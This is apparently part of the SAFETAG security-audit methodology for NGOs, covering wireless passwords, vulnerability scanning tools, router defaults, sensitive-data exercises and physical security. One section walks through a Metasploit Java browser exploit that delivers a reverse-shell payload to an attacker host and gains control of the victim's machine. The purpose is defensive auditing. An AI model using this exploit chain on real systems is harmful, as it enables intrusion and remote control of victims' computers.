Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Physical Security Guided Tour

Covered in full in Operational Security Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Check Browser and Plugin Vulnerabilities

Summary

Though modern browsers are better at self-updating, and the prevalence of powerful plugins like flash and java are slowly declining, it is valuable to ensure that the browsers in use have updated plugins and are themselves updated.

Overview
Materials Needed
Considerations
Walkthrough
Outdated Java browser plugins

While the threat described below is more severe if carried out by a local attacker (as they can more readily direct the victim to a malicious Web site), it also works remotely. In fact, if a user can be tricked, by a remote attacker, into clicking on a malicious email or Web link, attacks like this represent a significant perimeter threat. By compromising the victim’s machine, they can give the attacker a local point-of-presence without requiring the attacker to crack WPA keys or gain local access in some other way.

Step 1: Using Metasploit, an attacker can easily create an ad hoc malicious Web site:

$ msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1114 exploits - 627 auxiliary - 178 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops

msf > use exploit/multi/browser/java_jre17_exec

msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp

msf exploit(java_jre17_exec) > set LHOST 192.168.1.123
LHOST => 192.168.1.123

msf exploit(java_jre17_exec) > set SRVPORT 8081
SRVPORT => 8081

msf exploit(java_jre17_exec) > set URIPATH java_test
URIPATH => java_test

msf exploit(java_jre17_exec) > run
[*] Exploit running as background job.

Step 2: At this point, any local user who visits http://192.168.1.123:8081/java_test, and who is running a sufficiently out-of-date version of the Java browser plugin, stands a good chance of giving the attacker full access to his computer:

[*] Started reverse handler on 192.168.1.123:4444

msf exploit(java_jre17_exec) >

[*] Using URL: http://0.0.0.0:8081/java_test
[*] Local IP: http://192.168.1.123:8081/java_test
[*] Server started.

msf exploit(java_jre17_exec) >

<remote shell>

Figure 1: Attacker in control of the victim’s computer through a remote command shell

Recommendation

Vulnerability Scanning and Analysis

Summary

This component has the auditor discover possible flaws the organization's devices, services, application designs, and networks by testing and comparing them against a variety of online and offline resources (vulnerability databases, vendor advisories, and auditor investigation) to identify known vulnerabilities. Basic vulnerability analysis should be occurring along-side the other activities so that evidence can be gathered from the network, however, deeper research into specific discovered exploits can happen after the on-site audit to fully take advantage of the short time the auditor has on site.

Purpose

It is not uncommon for a cash-strapped human rights NGO to run critical infrastructure themselves on available equipment. A better-resourced organization may host its critical services at a remote data center, or outsource its IT infrastructure to cloud providers, such as Google Apps, and/or to ad-hoc services (Dropbox, Yahoo! mail, Wordpress, etc.). Regardless, it is rare to have someone designated to update and patch systems as vulnerabilities are released, or to view the services from a security -- as opposed to availability -- standpoint.

The Flow Of Information

Vulnerability Analysis Information Flow
Vulnerability Analysis Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Vulnerability Databases

Website Vulnerability Scanning

System Vulnerability Scanning

Activities

Vulnerability Scanning

Summary

While much of SAFETAG focuses on digital security challenges within and around the office, remote attacks on the organization's website, extranets, and unintended information available from "open sources" all pose real threats and deserve significant attention. SAFETAG takes great care to take a very passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns.

This activity uses active research and scanning to detect known vulnerabilities in external and key internal services. Usually penetration tests exploit possible vulnerabilities to confirm their existence. 72 But, the use of exploits puts the organization's systems at a level of increased risk 73 that is unacceptable when neither the organization nor the auditor has the time or finances to address the issue. The SAFETAG methodology only uses relatively safe exploitation of vulnerabilities for targeted outcomes. For instance, cracking the wireless access point password allows us to demonstrate the importance of good passwords without singling out any individual's passwords. 74

Overview
Materials Needed
Considerations
Walkthrough

Vulnerability Scanning using OpenVAS

Setting up OpenVAS in Kali

openvas initial setup
openvas feed update
openvas check setup
openvas stop
openvas start

Visit https://127.0.0.1:9392/ in a web browser and log in.

Using OpenVAS

Once logged in to OpenVAS, the interface is disturbingly simple to use. For most use, using the Wizard to scan the target server works best. Things to verify before doing so:

Once you start a scan, change the display to "auto refresh" to give you more feedback on the scan process. Once the scan is completed, a report can be exported in PDF form.

Common problems * Errors during openvas-start OpenVAS is a rather ... delicate program. Most often, the openvas-start script will not wait long enough between launching openvassd and openvasmd, causing openvasmd to error out. Re-running openvasmd often works, though an entire stop/start cycle seems to be slightly more reliable. Often, openvasmd will error out, but launch anyway. Checking the web interface at https://127.0.0.1:9392 to make sure that you can log in is the best way to check if it's actually successfully launched. * Lost admin password From a root command-line, you can reset the web interface's admin password:

openvasmd --create-user=admin
openvasmd --user=admin --new-password=admin

Recommendation

The auditor will need to do research and compare against the organization's capacity and risks to give specific recommendations based on the vulnerabilities discovered in the process. Some common recommendations include the following:

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

If an organization updates their website via FTP, it is worth noting that FTP is similarly insecure. Many hosting providers provide SFTP or FTPS, (two different, but secure, FTP versions), or secure WebDAV to upload files. These should be used, turning “plain” FTP off altogether if possible.

When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.

Vulnerability Research

Summary
Overview
Materials Needed
Considerations
Walkthrough

After completing an automated vulnerability scan (network, system, webapp) and documenting findings, you can now move into vulnerability research:

Validation: Each of your findings, once reviewed and documented will be enough for your report. However, if you and the organization agreed to verify findings and vulnerability truly exist, you may refer to Penetration Testing resources within SAFETAG framework.

Recommendation

Website Footprinting

See Website Footprinting in Recon for passive / lightweight investigation tools

Web Vulnerability Assessment

Summary

Organizational websites are often a central part of their work, but resource constraints can leave them vulnerable to a wide variety of attacks, from simple DDoS (Distributed Denial of Service) attacks to being leveraged for online scams and malicious advertisin to targeted distruction and subversion. Insecure websites can even be used in "watering hole" attacks where malware is implanted into the site to intentionally target the website's audience.

This activity provides a SAFETAG auditor with a suite of processes and tools to investigate organization and project websites for potential vulnerabilities. There are multiple ways to do this, from passive to more active scanning. SAFETAG takes great care to take a primarily passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns. Care should be taken to review operational security concerns, work closely with the organization, and pursue a minimal approach focused on the priorities of the organization. See also the Vulnerability Scanning activity for additional tools and approaches useful for investigating outside of the website itself the server level.

Overview
Materials Needed
Considerations
Walkthrough

Performing web vulnerability assessment can be done in different ways, using different tools and having different results. Choosing any of these steps or guides must not confuse an auditor, but instead, provide a broader scope which should help them finding vulnerabilities as many as they can.

These vulnerabilities can range from: - Web Server/OS level vulnerabilities - Access control vulnerabilities - Application-specific vulnerabilities - Misconfiguration - SQL Injection - Cross-site Scripting - Directory Traversal - Failure to restrict URL Access - Insufficient Transport Layer Protection - LDAP Injections - Malicious Codes - Leaked information

Before pursuing any of these more active scans, review outputs from passive reconnsaisance, DNS history and current information, and (if relevant) CMS version checking. This guide covers a small subset of web vulnerability scanning tools, a more comprehensive list is available at https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools which may provide approaches better suited to specific situations.

OpenVAS, covered in the vulnerablity scanning activity, also includes Wapiti, which can help to detect many of the above common vulnerablitites.


Manual Testing with Burp (Active)

Introduction

According to Burp's official documentation, "Burp Suite is an integrated platform for performing security testing of web applications. It is not a point-and-click tool, but is designed to be used by hands-on testers to support the testing process. With a little bit of effort, anyone can start using the core features of Burp to test the security of their applications. Some of Burp's more advanced features will take further learning and experience to master." To know more about BurpSuite's other tools and features, visit BurpSuite's Tools and it's functions pages.

Requirements

Note: If you are using Kali Linux, you already have Burpsuite pre-installed. Otherwise if you do not have a Linux box, refer to the following requirements below:

All of this investment is hugely worth it - Burp's user-driven workflow is by the far the most effective way to perform web security testing, and will take you way beyond the capabilities of any conventional point-and-click scanner. Burp is intuitive and user-friendly, and the best way to start learning is by doing. These steps will get you started with running Burp and using its basic features. You can then read on deeper into the documentation to become more proficient in using this supremely powerful tool.

Burp Suite contains various tools for performing different testing tasks. The tools operate effectively together, and you can pass interesting requests between tools as your work progresses, to carry out different actions.

To know more about BurpSuite's other tools and features, visit BurpSuite's Tools and it's functions pages.

Burp's Getting Started Documentation is quite detailed and useful, and strongly recommends launching Burp from the command line for better control. In specific, it recommends assigning the amount of memory you wish to dedicate to burp:

Requirements

Note: If you are using Kali Linux, you already have Burpsuite pre-installed. Otherwise if you do not have a Linux box, refer to the following requirements below:

Launching Burpsuite

With Java installed, on some platforms you may be able to run Burp directly by double-clicking the Burp JAR file. However, it is preferable to launch Burp from the command line, as this gives you more control over its execution, in particular the amount of memory that your computer assigns to Burp. To do this, in your command prompt type a command like:

java -jar -Xmx1024m /path/to/burp.jar

where 1024 is the amount of memory (in Mb) that you want to assign to Burp, and /path/to/burp.jar is the location of the Burp JAR file on your computer.

The troubleshooting help can help if Burp doesn't appear shortly.

Setting up your environment

Testing Burpsuite Configuration

NOTE: Scanning web applications without the owner's permission is potentially illegal. It is important that you test Burpsuite on your own web applications, or on a controlled environment. There are some publicly available websites that are insecure by default to be used for testing and learning purposes. Among these were:

(You can use these sites to get familiar with Burpsuite, and performing the following excerices in this guide.)

Intercepting Request

Adding Target/Scope - Adding your target into scope is important so you won't miss, or even scan URLs that are not included in your list of targets. - To add the target to your scope, right-click the domain/website, then select Add to Scope - Burp will now tell you if you want ot stop sending out-of-scope items in your HTTP history tab and other Burp Tools - click Yes. - This will now appear in your Target tab, and under Scope sub-tab. - To add subdomains into your scope, you can use regex: .*\.test\.com$

Managing Burp Projects - Managing burpsuites project will depend on the version you are using. Some features may not be available for free version of burp, but are only available for Pro Version. See burp's documentation for managing projects here - Selecting project type: - Temporary project - Quick tasks, no need to save data - New project on Disk - Creates new project and stores it on disk on a "Burp project file" - Open existing project - Opens recent existing project from a "Burp project file". Scanners & spiders are paused.

NOTE: According to BurpSuite documentation, "If you open an existing project that was created by a different installation of Burp, then Burp will prompt you to decide whether to take full ownership of the project.

This decision is needed because Burp stores within the project file an identifier that is used to retrieve any ongoing Burp Collaborator interactions that are associated with the project. If two instances of Burp share the same identifier in ongoing work, then some Collaborator-based issues may be missed or incorrectly reported. You should only take full ownership of a project from a different Burp installation if no other instance of Burp is working on that project."

Since that Burpsuite is an advance tool for testing web applications, This guide will cover most of the basic testing activities for Burpsuite. To learn more of the advance features, it is important that you have a licensed version.

Basic BurpSuite Testing Excercises:

Attacking web application using simple payload set (Bruteforce attack): - Verify that your Burp is working - You must first try to test if your Burp and browser are both configured

Take note of these errors to see how the target web application respond when given certain types of strings.

Setting up your environment

Selecting a Project

Selecting a Configuration

Opening a Project From a Different Burp Installation

Display Settings

The Basics of Using Burp ___

OWASP ZAP (Active)

OWASP ZAP allows an auditor to quickly identify common web vulnerabilities using the OWASP framework - either by a relatively intense spidering of the website or through a more tailored use of the proxy functionality of the tool.

OWASP ZAP provides a highly configurable tool to test for common website vulnerabilities. In addition to supporting organizational change to support general best practices for websites, OWASP can expose more specific vulnerabilties that may warrant action above and beyond general best practice work.

For a website that can be expected to withstand a dedicated spidering of its content, the automated mode will dig through and expose common vulnerabilities. The tool itself is relatively easy to use.

For more delicate sites, private sites, or other situations, OWASP can also proxy your web browser and test the pages you click through.

Quick Guide Setting up OWASP Zaproxy Scanner:

  1. Download the latest version of Zaproxy from: https://github.com/zaproxy/zaproxy/wiki/Downloads

  2. After installation, you will be brought into the OWASP Zaproxy's Session management page.
    • Yes, I want to persist this session with name based on the current timestamp
    • Yes, I want to persist this session but I want to specify the name and location
    • No, I don't want to persist this session at this moment in time
    • Remember my choice and do not ask me again

Note: By default, ZAP sessions are always recorded to disk in a HSQLDB database with a default name and location. If you do not persist the session, those files are deleted when you exit ZAP.

ZAP User Interface:

The ZAP user interface consist of the following options:

Options Description
Menu Bar Provides access to many of the automated and manual tools
Toolbar Includes buttons which provide easy access to most commonly used features
Tree Window Displays the Sites tree and the Scripts tree
Workspace Window Displays requests, responses, and scripts and allows you to edit them
Information Window Displays details of the automated and manual tools
Footer Displays a summary of the alerts found and the status of the main automated tools

Running Assessment:

Before you can run your assessment in ZAP, you need to configure your browser first to use ZAP as it's proxy. By default, ZAP uses:

Address: localhost Port: 8080

Note: Remember that Burpsuite also uses the same Address and port no. Be reminded to close any of which application that you are not using.

Since that ZAP is acting as a proxy between your browser and the web application, the use of SSL(HTTPS) may cause the certificate validation to fail and the connection be terminated. This happen because ZAP encrypts and decrypts traffic sent to the web application using the original web applications certificate. This is done so ZAP can access the plaintext in the request and the response.

To prevent this, ZAP creates an SSL cert automatically for each host you access, and signed by ZAP's CA certificate. To setup your browser to trust these SSL certs, you need to import and trust the ZAP root CA certificate. Once it's done, the other ZAP certificates signed by it will be trusted as well.

Keep the self-generated Root CA certificate to avoid creating a vulnerability.

  1. Start ZAP and click Tools -> Options.
  2. On the left pane of the Options window, click Dynamic SSL Certificates.
  3. On the right pane, click Save.
  4. Select a location to save the certificate to and click Save. Be sure to retain the .cer file extension.

To install the ZAP Root CA certificate as trusted root certificate for Windows/Chrome:

  1. Browse to the certificate file location.
  2. Right-click on the certificate file and then click Install Certificate.
  3. In the Certificate Import Wizard, select either Current User or Local Machine as the scope of the certificate, then click Next.
  4. Select Place all certificates in the following store.
  5. Click Browse and select Trusted Root Certificate Authorities or Trusted Root Certificates (depending on your version of Windows) as the certificate store, then click Next.
  6. Click Finish.
  7. Review the security warning about trusted root certificates and click Yes if the warning is accepted.

To verify that the ZAP Root CA certificate is installed:

  1. Open Control Panel and click Internet Options.
  2. On the Content tab, in the Certificates section, click Certificates.
  3. On the Trusted Root Certificates tab, verify that the OWASP ZAP Root CA certificate is listed.

If you are testing using Firefox, you need to install the ZAP Root CA certificate a second time into Firefox’s own certificate store.

To install the ZAP Root CA for Mozilla Firefox:

  1. Start Firefox and click Preferences.
  2. On the Advanced tab, click the Encryption tab.
  3. Click View Certificates.
  4. On the Trusted root certificates tab, click Import and select the ZAP Root CA file you saved previously.
  5. In the Import wizard, select Trust this CA to identify web sites.
  6. Click OK.

Additional OWASP ZAP references:


Nikto Web Scanner (Active)

Introduction

Nikto is a tool that comes with Kali Linux. It's an easy tool to use in performing web vulnerability scan. According to Nikto's main page:

"Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated"

In your Kali Linux you can use Nikto by:

  1. Go to Applications > Web Application Analysis > Web Vulnerability Scanners > Nikto

  2. Go to Applications > System > Root Terminal

Using Nikto to Scan Web Application

Nikto Command Description
nikto -Display V -h http://targetdomain.com Execute a simple scan. -Display to Display background process, V for verbose.
nikto -Display V -o scan_result.html -Format html -h http://targetdomain.com Saving Nikto's output into the file result.txt. You can specify the format of the output file using the -Format option (csv, html, msf, xml, txt)
nikto -userproxy -h http://targetdomain.com Scanning via proxy. Edit Nikto's configuration file in /etc/nikto.config.txt, and edit the values of PROXYHOST=XXX.XXX.XXX.XXX and PROXYPORT=XXXX to the corresponing values of your proxy.
nikto -Tuning (x) N -h http://targetdomain.com Tuning options will control the test that Nikto will use against a target. Replace N with the number option below. Enable x if using only single option. The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.
  1. File Upload
  2. Interesting File / Seen in logs
  3. Misconfiguration / Default File
  4. Information Disclosure
  5. Injection (XSS/Script/HTML)
  6. Remote File Retrieval - Inside Web Root
  7. Denial of Service
  8. Remote File Retrieval - Server Wide
  9. Command Execution / Remote Shell
  10. SQL Injection
  1. Authentication Bypass
  2. Software Identification
  3. Remote Source Inclusion
  4. Reverse Tuning Options (i.e., include all except specified)

Recommendation

Check Config Files

Summary

Examine configuration files for vulnerabilities using "hardening", or "common mistake" guides found online.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Network Vulnerabilities

See the Network Access and Mapping activities for methods to expose insecure wireless networks and for methods to use network mapping and traffic analysis to discover further potential vulnerabilities or points to investigate.

Router Based Attacks

Summary

Many wireless routers still use the default password listed in “Router Default Password Search”, meaning that anyone with access to the network could also take complete control of the router - adding in remote access tools or setting up other attacks.

Overview
Materials Needed
Considerations
Walkthrough
Material that may be Useful:
Recommendation

Change Default Router Passwords

Passwords - particularly on core network devices - is very important. Use a password manager to save the new password (or be prepared to reset the router to a factory default).

While nominally "inside the firewall" and protected from remote attacks, leaving routers with default passwords, particularly wireless routers whose networks are often shared with visitors, is a potentially very high risk for an organization. Anyone who has gained access to the network via legitimate or other means could subtly alter the router's configuration to provide remote access, or route traffic to an attacker-designated server. Such changes can easily go undetected for long periods of time.

A common fear is forgetting the new router password. A password management system is an obvious solution, but if the router is in a secure location, even a stickie note would be better than the default password.

Data Assessment

Summary

This component allows the auditor to identify what sensitive data exists for the organization, where it is stored, and how it is transferred.

Purpose

Sensitive files are often stored across multiple devices with different levels of security. A data assessment allows the auditor to recommend secure storage solutions which best meet the organizations risk assessment and workflow needs. While the auditor has insight on some of this based on the Network Access and Network Mapping work, cross-staff understanding and agreement on what constitutes sensitive data will support later organizational change.

An adversary who obtains a laptop, workstation, or backup drive will be able to read or modify sensitive information on the device, even if that staff member has set a strong account password. This applies to threats involving loss, theft, and confiscation, but also to "checkpoint" scenarios in which they may only have access for a few minutes. Furthermore, in the event of a burglary or office raid, an adversary could obtain all sensitive information on the organization's devices, possibly even undetected.

The Flow Of Information

Data Assessment Information Flow
Data Assessment Information Flow

Guiding Questions

Approaches

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Activities

Sensitive Data

Summary

Data and meta-data about an organization and its staff is incredibly difficult to keep track of over time, as people or projects use cloud services like Dropbox or Google Drive for some activities, a shared server for others, and a mix of work and personal devices (laptops, phones, tablets...).

This is natural, but it is important to keep track of where your organization's data lives and who can access it.

Overview
Materials Needed
Considerations
Walkthrough

Sensitive Data Assessment Activity

Duration: 45 minutes

This exercise is adapted from the LevelUp Activity, Backup Matrix, part of the curricula for Data Retrention and Backup by Daniel O'Clunaigh, Ali Ravi, Samir Nassar, and Carol.

Materials to Prepare:
Relative Sensitivity Computer USB / External Drive Cloud Storage Phones, Print, etc.
High
Moderate
Low

Explain to participants that we're going to conduct an information mapping activity to get a sense of where our important information actually is.

Start by listing the different places where our information is stored, according to participants. If no suggestions are forthcoming, we can prompt participants with the obvious stuff:

Use large stickies to place these as column headers on a wall. More will come up later in the course of the exercise.

Elicit from participants what type of information or data they have in each of these places. For example:

To encourage participant interaction, write one example on a sticky and place it in the appropriate box in the matrix. Then, ask whether there is another copy of this data somewhere. If there is, you can use another sticky and put it wherever they keep the duplicate.

TIP: Place Computers, Phones, and Email next to each other, so you won't have to create duplicates for everything "stored" in email (and therefore on laptops and phones)

Introduce a new vertical axis representing sensitivity. The higher on the chart, the more sensitive the data. Ask the participants to rank data.

For a large group, divide the group into smaller teams for the next steps (it helps if there are relatively clear thematic distinctions within the group, such as nationality, type of work, area of interest, etc.)

Provide stickies to the group(s). Have the group(s) brainstorm about all of the data they work with, focusing on the most important data first.

Participants should write ONE type per sticky, and create duplicates if the data is stored in multiple locations.

For a small group, this can be done as a "live" brainstorm. For larger groups that have been subdivided, have each group finish listing out their most important data and then have each group place the stickies on the matrix. Invite discussions around the sensitivity of the data.

An example may look something like this:

Level Up Backup Matrix Example
Level Up Backup Matrix Example

Explain that this gives us an idea of where our data is. Elicit whether or not this is all the data we generate? Of course it isn't: It's only a small percentage.

The LevelUp lesson uses this primarily to discuss the importance of backups, and this is a valuable point to make.

Call out the information that they are keeping on their computer's hard drive (which will usually be the fullest one). Elicit some of the things that can cause a computer to stop working. Maybe take a show of hands: Who has had this happen to them?

For SAFETAG, we focus on the "Sensitive data in the wrong hands" section. Based on the clustering of sensitive data along the vertical access, choose a column that has an unsual amount of sensitive data (email or computers, usually).

Remove the stickies from the column but keep them in your hand and read them. Now I have this information. What can I do with it? And what are you left with? Is anyone at risk - yourselves? partners? If this were published on the Internet, what would happen?

Recommendation

Risks of Data Lost and Found

Summary

Have staff rank the impact if different data within the organization was lost, and the impact if various adversaries gained access to that data.

Overview
Materials Needed
Considerations
Walkthrough

See the Sensitive Data activity for an interactive way to gather the types of data in the organization for this ranking exercise.

Recommendation

Private Data

Summary

Guide staff through an activity to have them list private data within the organization (e.g. Using the "personal information to keep private" handout. 76)

Overview
Materials Needed
Considerations
Walkthrough

Personal Information To Keep Private

Information that can be used to identify individuals, organizations, and even communities of practice should be treated with the utmost care. Some data, like names, phone numbers, and addresses are obvious, while others, like computer names, the MAC addresses of wifi cards, or pseudonymous social media accounts may be less obvious. Also, combinations of information - location, data, and type of activity, or even an issue area of interest and a city name may specify a very small number of activists or organizations.

This spreadsheet, part of the Responsible Data Forum documentation sprint provides a useful baseline of types of data and ways to manage or obfsucate it usefully: Data Anonymization Checklist

Recommendation

For the internal audit report back to the organization, much of the information will require specific identification of user devices (and by extension, their users), as well as very sensitive organizational data. None of this data, by intention, accident, or adversarial action, should be shared with third parties.

Please refer to the Analysis and Reporting section for the limited data set that is required for project reporting, and to the Operational Security section for guidance on data security.

Assessing Usage of Cloud Services

Summary

During the organizational assessment you will almost certainly come across 3rd party cloud-based service providers being used by the audited organization. The organization may be interested in your assessment of the security of those services. This poses several challenges to you as an auditor:

* auditing 3rd party web applications almost certainly falls outside of the scope of the audit engagement
* you likely do not have an agreement with the service provider to scan their application
* a proper assessment would take more time than is available for the organizational audit
* you may not be familiar with the service or technology it is built on

Despite these challenges, significant organizational processes and sensitive data may reside on or rely upon those 3rd party applications. It can be important to the audit to provide some preliminary investigation and risk assessment into the usage of any 3rd party cloud services they rely upon.

Overview
Materials Needed
Considerations
Walkthrough

It is increasingly difficult to run complex organizations without some reliance on cloud-based service providers such as email hosting, web hosting, or document management/backup. Organizations (and as assisted by the auditor) should review their options in the selection of cloud providers, and in parallel consider ways to apply practices and policies to their use to meet organizational security requirements.

Cloud Service Provider Review
Internal/Organizational Considerations
Recommendation

Schedule regular (annual?) reviews of the external services to ensure that they meet organizational requirements for functionality and security, business solvency, and exporting or transferring of data.

When considering formalizing the use of new 3rd party services, review the questions and processes here to help guide the decision.

Physical and Operational Security

Summary

The organizational security methodology is focused on how to mitigate against threats that occur because of the arrangement of digital assets in the physical world -- how secure are the devices at an organization's office, where and how staff travel with organizational devices, and whether staff work outside of the office (e.g. in remote offices, at their homes, while traveling, or at cafes). Further, is organizational information accessed from personal devices, and how are those devices secured?

Purpose

While the SAFETAG framework is focused on the security of data, the physicality of devices, backup drives, servers, and even hard-wired networks cannot be overlooked.

For many organizations, digital threats that depend on physical access are considered the least probable. So much so, that many security specialists concede that there is no proper defense against an attacker with physical access to sensitive hardware. While there is some truth to this, it is not useful advice for small scale civil society organizations or independent media houses. The risks that advocacy and media organizations face are far more varied, and the cost of lost information can be crippling to their ability to operate.

Depending on the specific threats for each organization, the auditor should consider the challenges of not only one-time exfiltration of data as well as potential ways an adversary could use physical access or proximity to the organization or its devices to gain ongoing remote access, track, or cause harm to the organization through the outright destruction of data.

The Flow Of Information

Data Assessment Information Flow
Data Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Activities

Guided Tour

Summary

During this component an auditor tours the audit location(s) and flags potential risks related to physical access at that location.

Overview

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Materials Needed
Considerations
Walkthrough

As part of your first day, have your point of contact walk you around the office - this is primarily a chance to understand the office layout and meet the rest of the staff, but take mental note of the devices in use and laying out on desks as you walk around the office. Note as well the location and access to components such as servers and networking components. Taking actual notes may make the staff feel that you are judging them, especially if this is your first interaction -- refrain from this, and if needed, also consider a more "neutral" note-taking process by integrating the Office Mapping activity.

If the auditor is unable to go to the office (or can only visit one of multiple offices), consider having the point of contact use a video call. You will want to have the entire staff be aware of this activity and know the person who is walking around the office. This requires sufficient bandwidth (and unmetered or low-cost) for a 1-hour video call. This could be scheduled for before or after office hours to both discover how devices are left overnight as well as reducing the impact on the network.

Similarly, the in-person tour can also be done outside of normal business hours. Please note: this can damage the trust the staff has in the auditor, as well as unintentionally embarrassing specific staff members in the eyes of the point of contact. It is not recommended to do this except for organizations who have already received training and worked on improving their physical/operational security practices and face an active adversary. This could be before the staff arrives in the morning, during lunch, or after hours (perhaps have dinner with your point of contact, and come back to check the organization afterwards). This gives a clearer picture of how devices are secured outside of the work day (are desktops and laptops unsecured, still on, logged in?). Are backup drives or other storage media easily accessible? Are doors to server rooms/closets locked? Are keys to these locked cabinets/rooms visible?

Materials that may be useful
Recommendation

Office Equipment is unsecured against burglary

Unsecured physical network components and devices such as computers, servers, and external drives present a risk of sensitive data loss through theft, seizure, and malicious interference. Access to network compontents and servers should be limited and devices should be secured when not in use.

In the event of a burglary or office raid, an attacker could easily obtain sensitive information from devices without encryption, external hard drives, and other easily accessible items. An advanced attacker could compromise the network for later surveillance.

Secure Devices

Lock in desks or via security cables all easily portable items

Any device which connects to the organization's digital assets (and therefore has passwords or cached data) or stores organizational data (including backup drives, laptops, desktops, cameras, other storage media), should be secured (ideally out of sight, such as in a locked cabinet or desk drawer) when not in use to prevent theft and discourage seizure.

Follow the Device Assessment guidelines on drive encryption.

Encrypted drives offer the best protection against data loss from stolen or seized devices. Follow the recommendations of the Device Assessment section, paying specific attention to the need for strong passwords, automatic locking of logged-in accounts, and the importance of turning a machine off to fully benefit from drive encryption.

Place core network components and servers in a locked space.

Direct access to servers and network components such as routers, cablemodems, patch panels and switches provides an adversary multiple ways to extract sensitive information and cause extensive, yet hard to detect, damage. Ensuring that not only are these physically protected, but that there are organizational policies around which staff have access to them is critical - a locked cabinet that always has the key in the lock does not provide security. If a particular component needs, for example, regular rebooting, creative solutions should be found to balance security and staff needs.

De-activate unused network ports

Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.

Operational Security Survey

Summary

This activity helps the auditor assess the organization's current operational security policies and practices through in-person or remote surveys and/or interviews. By also requesting to review and official policies as well as conducting multiple iterations of this with different staff members, some basic verification of the practices and awareness/understanding of existing policies can be achieved

Overview

The auditor interviews and/or requests survey input from organizational representatives, requests supporting documentation (e.g. policies) as relevant, and iterates/repeats as needed.

This activity is used to solidify the auditor's understanding of the physical risks the organization faces in its work as they impact information security:

This can be done entirely remotely over secure communications channels (see operational security considerations), and may be useful to be done partially or fully in advance of an in-person audit to further understand operational risks of traveling to the office location.

Materials Needed
Considerations
Walkthrough

